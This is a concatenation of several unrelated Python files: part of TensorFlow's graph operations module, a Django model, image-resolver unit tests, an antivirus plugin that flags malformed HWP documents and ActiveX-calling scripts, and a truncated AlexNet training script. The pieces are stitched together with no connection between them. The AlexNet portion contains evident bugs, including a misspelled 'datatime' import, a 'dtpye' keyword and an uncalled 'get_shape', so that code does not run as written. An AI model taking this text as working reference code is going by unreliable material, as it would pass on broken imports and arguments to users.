ValueError: If eager execution is enabled after creating/executing a
TensorFlow graph, or if options provided conflict with a previous call
to this function.
"""
if config is not None and not isinstance(config, config_pb2.ConfigProto):
raise TypeError(
"config must be a tf.ConfigProto, but got %s" % type(config))
if device_policy not in (None, context.DEVICE_PLACEMENT_EXPLICIT,
context.DEVICE_PLACEMENT_WARN,
context.DEVICE_PLACEMENT_SILENT,
context.DEVICE_PLACEMENT_SILENT_FOR_INT32):
raise ValueError(
"device_policy must be one of None, tf.contrib.eager.DEVICE_PLACEMENT_*"
)
if execution_mode not in (None, context.SYNC, context.ASYNC):
raise ValueError(
"execution_mode must be one of None, tf.contrib.eager.SYNC, "
"tf.contrib.eager.ASYNC")
# pylint: disable=protected-access
if context._default_mode == context.GRAPH_MODE:
graph_mode_has_been_used = (
_default_session_stack.stack
or len(get_default_graph().get_operations()) > 0) # pylint: disable=g-explicit-length-test
if graph_mode_has_been_used:
raise ValueError(
"tf.enable_eager_execution must be called at program startup.")
context._default_mode = context.EAGER_MODE
if context._context is None:
context._context = context.Context(
config=config,
device_policy=device_policy,
execution_mode=execution_mode)
elif ((config is not None and config is not context._context._config) or
(device_policy is not None and
device_policy is not context._context._device_policy) or
(execution_mode is not None and
execution_mode is not context._context._execution_mode)):
raise ValueError("Trying to change the options of an active eager"
" execution. Context config: %s, specified config:"
" %s. Context device policy: %s, specified device"
" policy: %s. Context execution mode: %s, "
" specified execution mode %s." %
(context._context._config, config,
context._context._device_policy, device_policy,
context._context._execution_mode, execution_mode))
else:
raise ValueError(
"tf.enable_eager_execution must be called at program startup.")
# Monkey patch to get rid of an unnecessary conditional since the context is
# now initialized.
context.context = context.context_safe
def eager_run(main=None, argv=None):
"""Runs the program with an optional main function and argv list.
The program will run with eager execution enabled.
Example:
```python
import tensorflow as tf
# Import subject to future changes:
from tensorflow.contrib.eager.python import tfe
def main(_):
u = tf.constant(6.0)
v = tf.constant(7.0)
print(u * v)
if __name__ == "__main__":
tfe.run()
```
Args:
main: the main function to run.
argv: the arguments to pass to it.
"""
enable_eager_execution()
app.run(main, argv)
@tf_export("reset_default_graph")
def reset_default_graph():
"""Clears the default graph stack and resets the global default graph.
NOTE: The default graph is a property of the current thread. This
function applies only to the current thread. Calling this function while
a `tf.Session` or `tf.InteractiveSession` is active will result in undefined
behavior. Using any previously created `tf.Operation` or `tf.Tensor` objects
after calling this function will result in undefined behavior.
Raises:
AssertionError: If this function is called within a nested graph.
"""
if not _default_graph_stack.is_cleared():
raise AssertionError("Do not use tf.reset_default_graph() to clear "
"nested graphs. If you need a cleared graph, "
"exit the nesting and create a new graph.")
_default_graph_stack.reset()
@tf_export("get_default_graph")
def get_default_graph():
"""Returns the default graph for the current thread.
The returned graph will be the innermost graph on which a
`Graph.as_default()` context has been entered, or a global default
graph if none has been explicitly created.
NOTE: The default graph is a property of the current thread. If you
create a new thread, and wish to use the default graph in that
thread, you must explicitly add a `with g.as_default():` in that
thread's function.
Returns:
The default `Graph` being used in the current thread.
"""
return _default_graph_stack.get_default()
def has_default_graph():
"""Returns True if there is a default graph."""
return len(_default_graph_stack.stack) >= 1
def get_name_scope():
"""Returns the current name scope in the default_graph.
For example:
```python
with tf.name_scope('scope1'):
with tf.name_scope('scope2'):
print(tf.get_name_scope())
```
would print the string `scope1/scope2`.
Returns:
A string representing the current name scope.
"""
if context.executing_eagerly():
return context.context().scope_name.rstrip("/")
return get_default_graph().get_name_scope()
def _assert_same_graph(original_item, item):
"""Fail if the 2 items are from different graphs.
Args:
original_item: Original item to check against.
item: Item to check.
Raises:
ValueError: if graphs do not match.
"""
if original_item.graph is not item.graph:
raise ValueError("%s must be from the same graph as %s." % (item,
original_item))
def _get_graph_from_inputs(op_input_list, graph=None):
"""Returns the appropriate graph to use for the given inputs.
This library method provides a consistent algorithm for choosing the graph
in which an Operation should be constructed:
1. If the default graph is being used to construct a function, we
use the default graph.
2. If the "graph" is specified explicitly, we validate that all of the inputs
in "op_input_list" are compatible with that graph.
3. Otherwise, we attempt to select a graph from the first Operation-
or Tensor-valued input in "op_input_list", and validate that all other
such inputs are in the same graph.
4. If the graph was not specified and it could not be inferred from
"op_input_list", we attempt to use the default graph.
Args:
op_input_list: A list of inputs to an operation, which may include `Tensor`,
`Operation`, and other objects that may be converted to a graph element.
graph: (Optional) The explicit graph to use.
Raises:
TypeError: If op_input_list is not a list or tuple, or if graph is not a
Graph.
ValueError: If a graph is explicitly passed and not all inputs are from it,
or if the inputs are from multiple graphs, or we could not find a graph
and there was no default graph.
Returns:
The appropriate graph to use for the given inputs.
"""
if get_default_graph().building_function:
return get_default_graph()
op_input_list = tuple(op_input_list) # Handle generators correctly
if graph and not isinstance(graph, Graph):
raise TypeError("Input graph needs to be a Graph: %s" % graph)
# 1. We validate that all of the inputs are from the same graph. This is
# either the supplied graph parameter, or the first one selected from one
# the graph-element-valued inputs. In the latter case, we hold onto
# that input in original_graph_element so we can provide a more
# informative error if a mismatch is found.
original_graph_element = None
for op_input in op_input_list:
# Determine if this is a valid graph_element.
# TODO(josh11b): Note that we exclude subclasses of Tensor. Need to clean this
# up.
graph_element = None
if (isinstance(op_input, (Operation, _TensorLike)) and
((not isinstance(op_input, Tensor)) or type(op_input) == Tensor)): # pylint: disable=unidiomatic-typecheck
graph_element = op_input
else:
graph_element = _as_graph_element(op_input)
if graph_element is not None:
if not graph:
original_graph_element = graph_element
graph = graph_element.graph
elif original_graph_element is not None:
_assert_same_graph(original_graph_element, graph_element)
elif graph_element.graph is not graph:
raise ValueError("%s is not from the passed-in graph." % graph_element)
# 2. If all else fails, we use the default graph, which is always there.
return graph or get_default_graph()
@tf_export("GraphKeys")
class GraphKeys(object):
"""Standard names to use for graph collections.
The standard library uses various well-known names to collect and
retrieve values associated with a graph. For example, the
`tf.Optimizer` subclasses default to optimizing the variables
collected under `tf.GraphKeys.TRAINABLE_VARIABLES` if none is
specified, but it is also possible to pass an explicit list of
variables.
The following standard keys are defined:
* `GLOBAL_VARIABLES`: the default collection of `Variable` objects, shared
across distributed environment (model variables are subset of these). See
@{tf.global_variables}
for more details.
Commonly, all `TRAINABLE_VARIABLES` variables will be in `MODEL_VARIABLES`,
and all `MODEL_VARIABLES` variables will be in `GLOBAL_VARIABLES`.
* `LOCAL_VARIABLES`: the subset of `Variable` objects that are local to each
machine. Usually used for temporarily variables, like counters.
Note: use `tf.contrib.framework.local_variable` to add to this collection.
* `MODEL_VARIABLES`: the subset of `Variable` objects that are used in the
model for inference (feed forward). Note: use
`tf.contrib.framework.model_variable` to add to this collection.
* `TRAINABLE_VARIABLES`: the subset of `Variable` objects that will
be trained by an optimizer. See
@{tf.trainable_variables}
for more details.
* `SUMMARIES`: the summary `Tensor` objects that have been created in the
graph. See
@{tf.summary.merge_all}
for more details.
* `QUEUE_RUNNERS`: the `QueueRunner` objects that are used to
produce input for a computation. See
@{tf.train.start_queue_runners}
for more details.
* `MOVING_AVERAGE_VARIABLES`: the subset of `Variable` objects that will also
keep moving averages. See
@{tf.moving_average_variables}
for more details.
* `REGULARIZATION_LOSSES`: regularization losses collected during graph
construction.
The following standard keys are _defined_, but their collections are **not**
automatically populated as many of the others are:
* `WEIGHTS`
* `BIASES`
* `ACTIVATIONS`
"""
# Key to collect Variable objects that are global (shared across machines).
# Default collection for all variables, except local ones.
GLOBAL_VARIABLES = "variables"
# Key to collect local variables that are local to the machine and are not
# saved/restored.
LOCAL_VARIABLES = "local_variables"
# Key to collect local variables which are used to accumulate interal state
# to be used in tf.metrics.*.
METRIC_VARIABLES = "metric_variables"
# Key to collect model variables defined by layers.
MODEL_VARIABLES = "model_variables"
# Key to collect Variable objects that will be trained by the
# optimizers.
TRAINABLE_VARIABLES = "trainable_variables"
# Key to collect summaries.
SUMMARIES = "summaries"
# Key to collect QueueRunners.
QUEUE_RUNNERS = "queue_runners"
# Key to collect table initializers.
TABLE_INITIALIZERS = "table_initializer"
# Key to collect asset filepaths. An asset represents an external resource
# like a vocabulary file.
ASSET_FILEPATHS = "asset_filepaths"
# Key to collect Variable objects that keep moving averages.
MOVING_AVERAGE_VARIABLES = "moving_average_variables"
# Key to collect regularization losses at graph construction.
REGULARIZATION_LOSSES = "regularization_losses"
# Key to collect concatenated sharded variables.
CONCATENATED_VARIABLES = "concatenated_variables"
# Key to collect savers.
SAVERS = "savers"
# Key to collect weights
WEIGHTS = "weights"
# Key to collect biases
BIASES = "biases"
# Key to collect activations
ACTIVATIONS = "activations"
# Key to collect update_ops
UPDATE_OPS = "update_ops"
# Key to collect losses
LOSSES = "losses"
# Key to collect BaseSaverBuilder.SaveableObject instances for checkpointing.
SAVEABLE_OBJECTS = "saveable_objects"
# Key to collect all shared resources used by the graph which need to be
# initialized once per cluster.
RESOURCES = "resources"
# Key to collect all shared resources used in this graph which need to be
# initialized once per session.
LOCAL_RESOURCES = "local_resources"
# Trainable resource-style variables.
TRAINABLE_RESOURCE_VARIABLES = "trainable_resource_variables"
# Key to indicate various ops.
INIT_OP = "init_op"
LOCAL_INIT_OP = "local_init_op"
READY_OP = "ready_op"
READY_FOR_LOCAL_INIT_OP = "ready_for_local_init_op"
SUMMARY_OP = "summary_op"
GLOBAL_STEP = "global_step"
# Used to count the number of evaluations performed during a single evaluation
# run.
EVAL_STEP = "eval_step"
TRAIN_OP = "train_op"
# Key for control flow context.
COND_CONTEXT = "cond_context"
WHILE_CONTEXT = "while_context"
# Used to store v2 summary names.
_SUMMARY_COLLECTION = "_SUMMARY_V2"
# List of all collections that keep track of variables.
_VARIABLE_COLLECTIONS = [
GLOBAL_VARIABLES,
LOCAL_VARIABLES,
METRIC_VARIABLES,
MODEL_VARIABLES,
TRAINABLE_VARIABLES,
MOVING_AVERAGE_VARIABLES,
CONCATENATED_VARIABLES,
TRAINABLE_RESOURCE_VARIABLES,
]
# Key for streaming model ports.
# NOTE(yuanbyu): internal and experimental.
_STREAMING_MODEL_PORTS = "streaming_model_ports"
@decorator_utils.classproperty
def VARIABLES(cls): # pylint: disable=no-self-argument
logging.log_first_n(logging.WARN,
"VARIABLES collection name is deprecated, please use "
"GLOBAL_VARIABLES instead; VARIABLES will be removed "
"after 2017-03-02.", 1)
return cls.GLOBAL_VARIABLES
@tf_export("add_to_collection")
def add_to_collection(name, value):
"""Wrapper for `Graph.add_to_collection()` using the default graph.
See @{tf.Graph.add_to_collection}
for more details.
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collection.
@compatibility(eager)
Collections are only supported in eager when variables are created inside an
EagerVariableStore (e.g. as part of a layer or template).
@end_compatibility
"""
get_default_graph().add_to_collection(name, value)
@tf_export("add_to_collections")
def add_to_collections(names, value):
"""Wrapper for `Graph.add_to_collections()` using the default graph.
See @{tf.Graph.add_to_collections}
for more details.
Args:
names: The key for the collections. The `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collections.
@compatibility(eager)
Collections are only supported in eager when variables are created inside an
EagerVariableStore (e.g. as part of a layer or template).
@end_compatibility
"""
get_default_graph().add_to_collections(names, value)
@tf_export("get_collection_ref")
def get_collection_ref(key):
"""Wrapper for `Graph.get_collection_ref()` using the default graph.
See @{tf.Graph.get_collection_ref}
for more details.
Args:
key: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
Returns:
The list of values in the collection with the given `name`, or an empty
list if no value has been added to that collection. Note that this returns
the collection list itself, which can be modified in place to change the
collection.
@compatibility(eager)
Collections are not supported when eager execution is enabled.
@end_compatibility
"""
return get_default_graph().get_collection_ref(key)
@tf_export("get_collection")
def get_collection(key, scope=None):
"""Wrapper for `Graph.get_collection()` using the default graph.
See @{tf.Graph.get_collection}
for more details.
Args:
key: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
scope: (Optional.) If supplied, the resulting list is filtered to include
only items whose `name` attribute matches using `re.match`. Items
without a `name` attribute are never returned if a scope is supplied and
the choice or `re.match` means that a `scope` without special tokens
filters by prefix.
Returns:
The list of values in the collection with the given `name`, or
an empty list if no value has been added to that collection. The
list contains the values in the order under which they were
collected.
@compatibility(eager)
Collections are not supported when eager execution is enabled.
@end_compatibility
"""
return get_default_graph().get_collection(key, scope)
def get_all_collection_keys():
"""Returns a list of collections used in the default graph."""
return get_default_graph().get_all_collection_keys()
name_scope_cache = {}
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export("name_scope", "keras.backend.name_scope")
class name_scope(object): # pylint: disable=invalid-name
"""A context manager for use when defining a Python op.
This context manager validates that the given `values` are from the
same graph, makes that graph the default graph, and pushes a
name scope in that graph (see
@{tf.Graph.name_scope}
for more details on that).
For example, to define a new Python op called `my_op`:
```python
def my_op(a, b, c, name=None):
with tf.name_scope(name, "MyOp", [a, b, c]) as scope:
a = tf.convert_to_tensor(a, name="a")
b = tf.convert_to_tensor(b, name="b")
c = tf.convert_to_tensor(c, name="c")
# Define some computation that uses `a`, `b`, and `c`.
return foo_op(..., name=scope)
```
"""
@property
def name(self):
return self._name
def __init__(self, name, default_name=None, values=None):
"""Initialize the context manager.
Args:
name: The name argument that is passed to the op function.
default_name: The default name to use if the `name` argument is `None`.
values: The list of `Tensor` arguments that are passed to the op function.
"""
self._name = default_name if name is None else name
self._default_name = default_name
self._values = values
self._ctx = context.context()
self._in_eager_mode = self._ctx.executing_eagerly()
def __enter__(self):
"""Start the scope block.
Returns:
The scope name.
Raises:
ValueError: if neither `name` nor `default_name` is provided
but `values` are.
"""
if self._in_eager_mode:
self._old_name = self._ctx.scope_name
if not self._name:
scope_name = ""
else:
cache_key = self._name, self._old_name, self._default_name
if cache_key in name_scope_cache:
self._ctx.scope_name = name_scope_cache[cache_key]
return self._ctx.scope_name
elif self._name[-1] == "/":
# A trailing slash breaks out of nested name scopes, indicating a
# fully specified scope name, for compatibility with Graph.name_scope.
scope_name = self._name
else:
name_with_trailing_slash = self._name + "/"
scope_name = (
self._old_name + name_with_trailing_slash
if self._old_name else name_with_trailing_slash)
name_scope_cache[cache_key] = scope_name
self._ctx.scope_name = scope_name
return scope_name
else:
if self._name is None and self._values is not None:
# We only raise an error if values is not None (provided) because
# currently tf.name_scope(None) (values=None then) is sometimes used as
# an idiom to reset to top scope.
raise ValueError(
"At least one of name (%s) and default_name (%s) must be provided."
% (self._name, self._default_name))
if self._values is None:
self._values = []
g = _get_graph_from_inputs(self._values)
self._g_manager = g.as_default()
self._g_manager.__enter__()
try:
self._name_scope = g.name_scope(self._name)
return self._name_scope.__enter__()
except:
self._g_manager.__exit__(*sys.exc_info())
raise
def __exit__(self, type_arg, value_arg, traceback_arg):
if self._in_eager_mode:
self._ctx.scope_name = self._old_name
else:
self._name_scope.__exit__(type_arg, value_arg, traceback_arg)
self._g_manager.__exit__(type_arg, value_arg, traceback_arg)
return False # False values do not suppress exceptions
def strip_name_scope(name, export_scope):
"""Removes name scope from a name.
Args:
name: A `string` name.
export_scope: Optional `string`. Name scope to remove.
Returns:
Name with name scope removed, or the original name if export_scope
is None.
"""
if export_scope:
if export_scope[-1] == "/":
export_scope = export_scope[:-1]
try:
# Strips export_scope/, export_scope///,
# ^export_scope/, loc:@export_scope/.
str_to_replace = r"([\^]|loc:@|^)" + export_scope + r"[\/]+(.*)"
return re.sub(str_to_replace, r"\1\2", compat.as_str(name), count=1)
except TypeError as e:
# If the name is not of a type we can process, simply return it.
logging.warning(e)
return name
else:
return name
def prepend_name_scope(name, import_scope):
"""Prepends name scope to a name.
Args:
name: A `string` name.
import_scope: Optional `string`. Name scope to add.
Returns:
Name with name scope added, or the original name if import_scope
is None.
"""
if import_scope:
if import_scope[-1] == "/":
import_scope = import_scope[:-1]
try:
str_to_replace = r"([\^]|loc:@|^)(.*)"
return re.sub(str_to_replace, r"\1" + import_scope + r"/\2",
compat.as_str(name))
except TypeError as e:
# If the name is not of a type we can process, simply return it.
logging.warning(e)
return name
else:
return name
# pylint: disable=g-doc-return-or-yield
# pylint: disable=not-context-manager
@tf_export("op_scope")
@tf_contextlib.contextmanager
def op_scope(values, name, default_name=None):
"""DEPRECATED. Same as name_scope above, just different argument order."""
logging.warn("tf.op_scope(values, name, default_name) is deprecated,"
" use tf.name_scope(name, default_name, values)")
with name_scope(name, default_name=default_name, values=values) as scope:
yield scope
_proto_function_registry = registry.Registry("proto functions")
def register_proto_function(collection_name,
proto_type=None,
to_proto=None,
from_proto=None):
"""Registers `to_proto` and `from_proto` functions for collection_name.
`to_proto` function converts a Python object to the corresponding protocol
buffer, and returns the protocol buffer.
`from_proto` function converts protocol buffer into a Python object, and
returns the object..
Args:
collection_name: Name of the collection.
proto_type: Protobuf type, such as `saver_pb2.SaverDef`,
`variable_pb2.VariableDef`, `queue_runner_pb2.QueueRunnerDef`..
to_proto: Function that implements Python object to protobuf conversion.
from_proto: Function that implements protobuf to Python object conversion.
"""
if to_proto and not callable(to_proto):
raise TypeError("to_proto must be callable.")
if from_proto and not callable(from_proto):
raise TypeError("from_proto must be callable.")
_proto_function_registry.register((proto_type, to_proto, from_proto),
collection_name)
def get_collection_proto_type(collection_name):
"""Returns the proto_type for collection_name."""
try:
return _proto_function_registry.lookup(collection_name)[0]
except LookupError:
return None
def get_to_proto_function(collection_name):
"""Returns the to_proto function for collection_name."""
try:
return _proto_function_registry.lookup(collection_name)[1]
except LookupError:
return None
def get_from_proto_function(collection_name):
"""Returns the from_proto function for collection_name."""
try:
return _proto_function_registry.lookup(collection_name)[2]
except LookupError:
return None
def _operation_conversion_error(op, dtype=None, name=None, as_ref=False):
"""Produce a nice error if someone converts an Operation to a Tensor."""
raise TypeError(("Can't convert Operation '%s' to Tensor "
"(target dtype=%r, name=%r, as_ref=%r)") % (op.name, dtype,
name, as_ref))
register_tensor_conversion_function(Operation, _operation_conversion_error)
|
# ==============================================================================
# A NewArea is one specific Area + AreaName + AreaTerritory that starts
# due to exactly one HiventOperation.
#
# ------------------------------------------------------------------------------
# NewArea n:1 HiventOperation
# NewArea 1:1 Area
# NewArea 1:1 AreaName
# NewArea 1:1 AreaTerritory
# ==============================================================================
from django.db import models
from django.forms.models import model_to_dict
# ==============================================================================
class NewArea(models.Model):
# superordinate: HiventOperation
hivent_operation = models.ForeignKey ('HiventOperation', related_name='new_hivent_operation', default=0)
# own attributes
area = models.ForeignKey ('Area', related_name='new_area', default=0)
name = models.ForeignKey ('AreaName', related_name='new_area_name', default=0)
territory = models.ForeignKey ('AreaTerritory', related_name='new_area_territory', default=0)
# ----------------------------------------------------------------------------
def __unicode__(self):
return self.name.short_name
# ----------------------------------------------------------------------------
class Meta:
app_label = 'HistoGlobe_server'
|
import sys
import unittest
import requests
from os.path import dirname,abspath
sys.path.append( dirname( dirname( dirname( abspath(__file__)) ) ) )
from imageresolver import ImageResolver, FileExtensionResolver, PluginResolver, WebpageResolver
class TestImageResolver(unittest.TestCase):
def setUp(self):
# set to an imgur page
self.imgur_page = 'http://imgur.com/adtBv9Y'
# set to the expected result of the imgur page
# also checks the file extension
self.imgur_result = 'http://i.imgur.com/adtBv9Y.jpg'
# set to a web url
self.web_url = 'http://xkcd.com/353/'
# set to the expected return image from the web url
self.web_img = 'http://imgs.xkcd.com/comics/python.png'
def test_fetch_image_info(self):
i = ImageResolver()
(ext,width,height) = i.fetch_image_info(self.web_img)
self.assertEquals(ext,'.png')
self.assertEquals(width,518)
self.assertEquals(height,588)
def test_resolve_plugin(self):
i = ImageResolver()
i.register(PluginResolver())
src = i.resolve(self.imgur_page)
self.assertEquals(src,self.imgur_result)
def test_resolve_fileext(self):
i = ImageResolver()
i.register(FileExtensionResolver())
src = i.resolve(self.web_img)
self.assertEquals(src,self.web_img)
def test_resolve_webpage(self):
i = ImageResolver()
i.register(WebpageResolver(load_images=True))
src = i.resolve(self.web_url)
self.assertEquals(src, self.web_img )
|
# -*- coding:utf-8 -*-
# Author: Kei Choi([email protected])
import os
import re
import zlib
import kernel
import kavutil
import ole
# -------------------------------------------------------------------------
# get_hwp_recoard(val)
# 입력된 4Byte 값을 HWP 레코드 구조에 맞게 변환하여 추출한다.
# 입력값 : val - DWORD
# 리턴값 : tag_id, level, size
# -------------------------------------------------------------------------
def get_hwp_recoard(val):
b = 0b1111111111
c = 0b111111111111
tag_id = (val & b)
level = ((val >> 10) & b)
size = (val >> 20) & c
return tag_id, level, size
# -------------------------------------------------------------------------
# scan_hwp_recoard(buf, lenbuf)
# 주어진 버퍼를 HWP 레코드 구조로 해석한다.
# 입력값 : buf - 버퍼
# lenbuf - 버퍼 크기
# 리턴값 : True or False (HWP 레코드 추적 성공 여부) 및 문제의 tagid
# -------------------------------------------------------------------------
def scan_hwp_recoard(buf, lenbuf):
pos = 0
tagid = 0
while pos < lenbuf:
extra_size = 4
val = kavutil.get_uint32(buf, pos)
tagid, level, size = get_hwp_recoard(val)
if size == 0xfff:
extra_size = 8
size = kavutil.get_uint32(buf, pos + 4)
if tagid == 0x43 and size > 4000: # PARA_TEXT
t_buf = buf[pos:pos+size+extra_size]
d_buf = zlib.compress(t_buf)
if len(d_buf) / float(len(t_buf)) < 0.02:
return False, 0x43
pos += (size + extra_size)
if pos == lenbuf:
return True, -1
return False, tagid
# -------------------------------------------------------------------------
# KavMain 클래스
# -------------------------------------------------------------------------
class KavMain:
# ---------------------------------------------------------------------
# init(self, plugins_path)
# 플러그인 엔진을 초기화 한다.
# 인력값 : plugins_path - 플러그인 엔진의 위치
# verbose - 디버그 모드 (True or False)
# 리턴값 : 0 - 성공, 0 이외의 값 - 실패
# ---------------------------------------------------------------------
def init(self, plugins_path, verbose=False): # 플러그인 엔진 초기화
self.handle = {}
self.hwp_ole = re.compile('bindata/bin\d+\.ole$', re.IGNORECASE)
s = r'n\x00e\x00w\x00(\x20\x00)+A\x00c\x00t\x00i\x00v\x00e\x00X\x00O\x00b\x00j\x00e\x00c\x00t\x00'
self.hwp_js = re.compile(s, re.IGNORECASE)
return 0 # 플러그인 엔진 초기화 성공
# ---------------------------------------------------------------------
# uninit(self)
# 플러그인 엔진을 종료한다.
# 리턴값 : 0 - 성공, 0 이외의 값 - 실패
# ---------------------------------------------------------------------
def uninit(self): # 플러그인 엔진 종료
return 0 # 플러그인 엔진 종료 성공
# ---------------------------------------------------------------------
# getinfo(self)
# 플러그인 엔진의 주요 정보를 알려준다. (제작자, 버전, ...)
# 리턴값 : 플러그인 엔진 정보
# ---------------------------------------------------------------------
def getinfo(self): # 플러그인 엔진의 주요 정보
info = dict() # 사전형 변수 선언
info['author'] = 'Kei Choi' # 제작자
info['version'] = '1.1' # 버전
info['title'] = 'HWP Engine' # 엔진 설명
info['kmd_name'] = 'hwp' # 엔진 파일 이름
info['make_arc_type'] = kernel.MASTER_DELETE # 악성코드 치료는 삭제로...
info['sig_num'] = len(self.listvirus()) # 진단/치료 가능한 악성코드 수
return info
# ---------------------------------------------------------------------
# listvirus(self)
# 진단/치료 가능한 악성코드의 리스트를 알려준다.
# 리턴값 : 악성코드 리스트
# ---------------------------------------------------------------------
def listvirus(self): # 진단 가능한 악성코드 리스트
vlist = list() # 리스트형 변수 선언
vlist.append('Exploit.HWP.Generic') # 진단/치료하는 악성코드 이름 등록
vlist.append('Exploit.JS.Agent.gen') # 진단/치료하는 악성코드 이름 등록
vlist.sort()
return vlist
# ---------------------------------------------------------------------
# scan(self, filehandle, filename, fileformat)
# 악성코드를 검사한다.
# 입력값 : filehandle - 파일 핸들
# filename - 파일 이름
# fileformat - 파일 포맷
# filename_ex - 파일 이름 (압축 내부 파일 이름)
# 리턴값 : (악성코드 발견 여부, 악성코드 이름, 악성코드 ID) 등등
# ---------------------------------------------------------------------
def scan(self, filehandle, filename, fileformat, filename_ex): # 악성코드 검사
mm = filehandle
if filename_ex.lower().find('bodytext/section') >= 0 or filename_ex.lower().find('docinfo') >= 0:
val = kavutil.get_uint32(mm, 0)
tagid, level, size = get_hwp_recoard(val)
# 문서의 첫번째 tag가 문서 헤더(0x42), 문서 속성(0x10) 일때만 추적 진행
if tagid == 0x42 or tagid == 0x10:
ret, tagid = scan_hwp_recoard(mm, len(mm))
if ret is False: # 레코드 추적 실패
return True, 'Exploit.HWP.Generic.%02X' % tagid, 0, kernel.INFECTED
elif filename_ex.lower().find('scripts/defaultjscript') >= 0:
if self.hwp_js.search(mm):
return True, 'Exploit.JS.Agent.gen', 0, kernel.INFECTED
# 악성코드를 발견하지 못했음을 리턴한다.
return False, '', -1, kernel.NOT_FOUND
# ---------------------------------------------------------------------
# disinfect(self, filename, malware_id)
# 악성코드를 치료한다.
# 입력값 : filename - 파일 이름
# : malware_id - 치료할 악성코드 ID
# 리턴값 : 악성코드 치료 여부
# ---------------------------------------------------------------------
def disinfect(self, filename, malware_id): # 악성코드 치료
try:
# 악성코드 진단 결과에서 받은 ID 값이 0인가?
if malware_id == 0:
os.remove(filename) # 파일 삭제
return True # 치료 완료 리턴
except IOError:
pass
return False # 치료 실패 리턴
|
'''
date: 2017-09-20
author: scutjason
'''
'''
AlexNet for mnist model
5 Convolutional Layer
3 Full-connect Layer
'''
import tensorflow as tf
'''
# get the dataSets
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("dataSets", one_hot = True)
# first, define the super_param
learning_rate = 0.001
training_iters = 200000
batch_size = 64
display_step = 20
# define the network param
n_input = 784
n_classes = 10
dropout = 0.8
# define x, y
x = tf.placeholder(tf.float32, [None, n_input])
y = tf.placeholder(tf.float32, [None, n_classes])
keep_prob = tf.placeholder(tf.float32)
# define the conv layer
def conv2d(name, l_input, w, b):
return tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(l_input, w, strides=[1,1,1,1], padding='SAME'), b), name=name)
# pool layer
def max_pool(name, l_input, k):
return tf.nn.max_pool(l_input, ksize=[1,k,k,1], strides=[1,k,k,1], padding='SAME', name=name)
# local response normalization
def norm(name, l_input, lsize=4):
return tf.nn.lrn(l_input, lsize, bias=1.0, alpha=0.001/9.0, beta=0.75, name=name)
def alex_net(_X, _weights, _biases, _dropout):
# reshape to matrix, -1: python just calc itself
_X = tf.reshape(_X, shape=[-1, 28, 28, 1])
# conv1
conv1 = conv2d("conv1", _X, _weights["wc1"], _biases["bc1"])
# pool1
pool1 = max_pool("pool1", conv1, k=2)
# norm1
norm1 = norm("norm1", pool1, lsize=4)
# dropout
norm1 = tf.nn.dropout(norm1, _dropout)
# conv2
conv2 = conv2d("conv2", norm1, _weights["wc2"], _biases["bc2"])
pool2 = max_pool("pool2", conv2, k=2)
norm2 = norm("norm2", pool2, lsize=4)
norm2 = tf.nn.dropout(norm2, _dropout)
# conv3
conv3 = conv2d("conv3", norm2, _weights["wc3"], _biases["bc3"])
pool3 = max_pool("pool3", conv3, k=2)
norm3 = norm("norm3", pool3, lsize=4)
norm3 = tf.nn.dropout(norm3, _dropout)
# fc1
dense1 = tf.reshape(norm3, [-1, _weights["wd1"].get_shape().as_list()[0]])
print(dense1.get_shape())
dense1 = tf.nn.relu(tf.matmul(dense1, _weights["wd1"]) + _biases["bd1"], name="fc1")
# fc2
dense2 = tf.nn.relu(tf.matmul(dense1, _weights["wd2"]) + _biases["bd2"], name="fc2")
out = tf.matmul(dense2, _weights["out"]) + _biases["out"]
return out
weights = {
"wc1": tf.Variable(tf.random_normal([3,3,1,64])),
"wc2": tf.Variable(tf.random_normal([3,3,64,128])),
"wc3": tf.Variable(tf.random_normal([3,3,128,256])),
"wd1": tf.Variable(tf.random_normal([4*4*256, 1024])),
"wd2": tf.Variable(tf.random_normal([1024,1024])),
"out": tf.Variable(tf.random_normal([1024, 10]))
}
biases = {
"bc1": tf.Variable(tf.random_normal([64])),
"bc2": tf.Variable(tf.random_normal([128])),
"bc3": tf.Variable(tf.random_normal([256])),
"bd1": tf.Variable(tf.random_normal([1024])),
"bd2": tf.Variable(tf.random_normal([1024])),
"out": tf.Variable(tf.random_normal([n_classes]))
}
# build the model, pred is the output class
pred = alex_net(x, weights, biases, keep_prob)
# loss
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = pred, labels = y))
# learn let cost least
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# test
correct_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# init variable
init = tf.global_variables_initializer()
# sess
with tf.Session() as sess:
sess.run(init)
step = 1
while step*batch_size < training_iters:
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
sess.run(optimizer, feed_dict={x: batch_xs, y:batch_ys, keep_prob:dropout})
if step % display_step == 0:
acc = sess.run(accuracy, feed_dict={x: batch_xs, y:batch_ys, keep_prob:1.})
loss = sess.run(cost, feed_dict={x: batch_xs, y: batch_ys, keep_prob:1.0})
print("Iter" +str(step*batch_size) + ", Minibatch Loss = " + "{:.6f}".format(loss) + ", Training Accuracy = " + "{:.5f}".format(acc))
step +=1
print("Optimization Finished!")
print("Testing Accuracy:", sess.run(accuracy, feed_dict={x: mnist.test.images[:256], y: mnist.test.labels[:256], keep_prob: 1.0}))
'''
# alexNet model
from datatime import datatime
import math
import time
batch_size = 32
num_batches = 100
# print every layer
def print_activations(t):
print(t.op.name, t.get_shape.as_list())
# model
def inference(images):
parameters = []
# conv1
with tf.name_scope("conv1") as scope:
kernel = tf.Variable(tf.truncated_normal([11,11,3,96], dtpye = tf.float32, stddev=1e-1), name = 'weight')
# output: 55*55*96, get rid of edge
conv = tf.nn.conv2d(images, kernel, [1,4,4,1], padding='SAME')
biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32), trainable=True, name='biases')
bias = tf.nn.bias_add(conv, biases)
# relu
conv1 = tf.nn.relu(bias, name=scope)
print_activations(conv1)
parameters += [kernel, biases]
# lrn1
# depth_radius = 4
